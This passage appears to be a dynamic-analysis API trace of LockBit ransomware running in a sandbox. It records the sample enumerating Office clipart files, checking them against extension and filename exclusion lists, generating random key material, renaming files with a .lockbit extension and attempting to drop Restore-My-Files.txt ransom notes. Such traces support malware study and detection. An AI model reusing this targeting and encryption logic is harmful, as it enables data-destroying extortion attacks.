(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.502] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.504] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.504] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.504] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.506] free (_Block=0x1fa2ed8) [0175.506] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.506] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.506] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.506] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x778cf500, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x778cf500, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2bb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00483_.WMF", cAlternateFileName="")) returned 1 [0175.506] lstrcmpiW (lpString1=".", lpString2="SO00483_.WMF") returned -1 [0175.506] lstrcmpiW (lpString1="..", lpString2="SO00483_.WMF") returned -1 [0175.506] PathFindExtensionW (pszPath="SO00483_.WMF") returned=".WMF" [0175.506] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.506] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.506] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.506] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.506] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.506] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.507] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.508] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.508] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00483_.WMF") returned -1 [0175.508] lstrcmpiW (lpString1="ntldr", lpString2="SO00483_.WMF") returned -1 [0175.508] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00483_.WMF") returned -1 [0175.509] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00483_.WMF") returned -1 [0175.509] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00483_.WMF") returned -1 [0175.509] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00483_.WMF") returned 1 [0175.509] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00483_.WMF") returned -1 [0175.509] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.509] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00483_.WMF") returned=".WMF" [0175.509] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.509] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.509] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.510] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.510] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00483_.WMF.lockbit") returned 72 [0175.510] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00483_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00483_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.511] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.511] malloc (_Size=0x40068) returned 0x3df0008 [0175.512] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11192) returned 1 [0175.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.513] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00483_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00483_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.519] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.519] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.520] free (_Block=0x1fa2ed8) [0175.520] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00483_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.520] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.520] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.520] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad09800, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9ad09800, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x1e58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00486_.WMF", cAlternateFileName="")) returned 1 [0175.521] lstrcmpiW (lpString1=".", lpString2="SO00486_.WMF") returned -1 [0175.521] lstrcmpiW (lpString1="..", lpString2="SO00486_.WMF") returned -1 [0175.521] PathFindExtensionW (pszPath="SO00486_.WMF") returned=".WMF" [0175.521] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.521] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.522] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.522] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00486_.WMF") returned -1 [0175.523] lstrcmpiW (lpString1="ntldr", lpString2="SO00486_.WMF") returned -1 [0175.523] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00486_.WMF") returned -1 [0175.523] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00486_.WMF") returned -1 [0175.523] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00486_.WMF") returned -1 [0175.523] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00486_.WMF") returned 1 [0175.523] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00486_.WMF") returned -1 [0175.523] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.523] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00486_.WMF") returned=".WMF" [0175.523] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.523] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.523] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.524] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.524] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00486_.WMF.lockbit") returned 72 [0175.524] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00486_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00486_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.529] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.530] malloc (_Size=0x40068) returned 0x3df0008 [0175.530] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7768) returned 1 [0175.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.531] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00486_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00486_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.532] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.532] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.539] free (_Block=0x1fa2ed8) [0175.539] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00486_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.539] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.539] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c3a800, ftCreationTime.dwHighDateTime=0x1bd4b20, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb4c3a800, ftLastWriteTime.dwHighDateTime=0x1bd4b20, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00505_.WMF", cAlternateFileName="")) returned 1 [0175.539] lstrcmpiW (lpString1=".", lpString2="SO00505_.WMF") returned -1 [0175.539] lstrcmpiW (lpString1="..", lpString2="SO00505_.WMF") returned -1 [0175.539] PathFindExtensionW (pszPath="SO00505_.WMF") returned=".WMF" [0175.539] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.539] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.540] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.540] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.541] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00505_.WMF") returned -1 [0175.541] lstrcmpiW (lpString1="ntldr", lpString2="SO00505_.WMF") returned -1 [0175.541] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00505_.WMF") returned -1 [0175.541] lstrcmpiW 